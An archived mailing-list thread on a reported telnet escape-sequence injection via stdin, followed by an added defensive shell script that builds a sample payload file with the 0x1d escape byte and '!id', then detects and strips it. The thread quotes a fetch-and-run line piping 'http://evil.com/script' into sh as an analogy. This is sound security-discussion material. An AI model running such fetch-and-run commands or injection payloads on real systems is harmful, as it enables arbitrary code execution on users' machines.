bug-inetutils

Re: [bug-inetutils] telnet security advisory


From: Simon Josefsson
Subject: Re: [bug-inetutils] telnet security advisory
Date: Mon, 03 Oct 2011 20:11:52 +0200
User-agent: Gnus/5.110018 (No Gnus v0.18) Emacs/23.2 (gnu/linux)

sha0 <address@hidden> writes:

> Hi Simon,
>
> I know this is a "feature", but connecting the stdin of telnet to any kind
> of controllable input will lead to command execution; it is a dangerous
> default option.

I'm not sure I follow -- connecting the stdin of /bin/sh (as root) with
any kind of input controllable by an attacker is equally dangerous.
What difference do you see between that example and your problem?

Also, doesn't the -E parameter work?  It should disable the escape
sequence.

> I also have another vulnerability related to the stdin parser; it is a SIGSEGV.
> I'm studying whether I can control the movl to overwrite a function pointer
> in memory in order to get execution.

Can you post a backtrace?  The telnet interactive prompt parser is most
likely just buggy.

/Simon

> But also, the attack vector is stdin, so the attack vector is "rare".
>
>
> regards.
>
>
> 2011/10/3 Simon Josefsson <address@hidden>
>
>> sha0 <address@hidden> writes:
>>
>> > Hello,
>> >
>> > It is possible to inject an escape sequence via stdin to telnet, and arbitrary
>> > commands will be executed,
>>
>> Hi!  Thanks for studying InetUtils for security problems.  I'm not sure
>> I follow your "attack" though.
>>
>> > for example:
>> >
>> >
>> >  #  cat evil-file | telnet 127.0.0.1 80
>> > Trying 127.0.0.1...
>> > Connected to 127.0.0.1.
>> > Escape character is '^]'.
>> >
>> > telnet> !id
>> > uid=0(root) gid=0(root)
>> > groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
>> > Connection closed by foreign host.
>> >
>> >
>> > I think it is very dangerous, even though few admins use telnet for moving
>> > files like this
>>
>> Yes it is dangerous, so don't do that.  Use ftp to transfer files.
>>
>> > 3. DESCRIPTION
>> > -------------------------
>> > When telnet is used to transfer files to a remote TCP port, a very dangerous
>> > vulnerability is present that allows remote arbitrary code execution.
>>
>> The attack seems to be based on tricking the local root user into doing
>> something stupid.  This is similar to asking the local root user to do
>> 'wget -O - http://evil.com/script | sh'.  There is no security bug in
>> wget or sh just because that is possible.
>>
>> > 7. SOLUTION
>> > -------------------------
>> > The stdin parser must filter the 0x9d byte.
>>
>> The ^] escape sequence is a documented feature, so I don't think that is
>> a solution.
>>
>> You can use the command line parameter -E to inhibit the escape
>> character if you want.  Quoting 'telnet --help':
>>
>>  -E, --no-escape            use no escape character
>>
>> /Simon
>>
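The following script is an added example, not part of the thread above and not code from InetUtils. It reconstructs the "evil-file" from the report as a constructed sample (an HTTP request line with the telnet escape character ^], byte 0x1d, followed by "!id"), shows how to count and strip that byte before a file is ever piped into an interactive telnet, and shows the -E invocation Simon points to. The HTTP request text and the file paths are assumptions for the demo; only the 0x1d byte and the `!command` syntax come from the thread.

```shell
#!/bin/sh
# Added example for the bug-inetutils thread on telnet escape injection.
# Not InetUtils code: it models the pre-check a practitioner would run
# before doing "cat file | telnet host port".

# Build a constructed sample of the reported "evil-file": a normal-looking
# request line, then the telnet escape byte ^] (octal 035 = 0x1d) and "!id".
# In interactive telnet the escape byte drops to the "telnet>" prompt and
# "!cmd" runs cmd in a local shell, with the caller's privileges.
make_evil_file() {
    # $1 = path to write (assumed by the demo)
    printf 'GET / HTTP/1.0\r\n\035!id\r\n\r\n' > "$1"
}

# Count occurrences of the escape byte 0x1d in a file.
# od prints one hex byte per token; we count the "1d" tokens.
# A result of 0 means the file cannot reach the telnet> prompt via ^].
count_escape_bytes() {
    od -An -tx1 -v "$1" | tr -s ' ' '\n' | grep -c '^1d$' || true
}

# Remove every 0x1d byte so the payload can no longer switch telnet into
# command mode. This changes the data; it is a last resort when the file
# must be sent through an interactive telnet rather than a non-interactive tool.
strip_escape_bytes() {
    tr -d '\035' < "$1"
}

# Safe invocation: -E disables the escape character entirely, so no byte in
# the input can open the telnet> prompt. Kept as a shell function so it can be
# shown without a live listener on the host.
safe_send() {
    # $1 = file, $2 = host, $3 = port
    telnet -E "$2" "$3" < "$1"
}

# Stand-alone demo when run directly.
if [ "${DEMO_RUN:-0}" = 1 ]; then
    f=$(mktemp)
    make_evil_file "$f"
    echo "escape bytes in constructed file: $(count_escape_bytes "$f")"
    c=$(mktemp)
    strip_escape_bytes "$f" > "$c"
    echo "escape bytes after stripping:     $(count_escape_bytes "$c")"
    echo "to send without escape processing: telnet -E HOST PORT < $f"
    rm -f "$f" "$c"
fi
```

Run with `DEMO_RUN=1 sh script.sh` to see the counts; `safe_send file host port` is the form that matches Simon's advice, and the count check is what you would put in front of any script that still pipes files into an interactive telnet.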
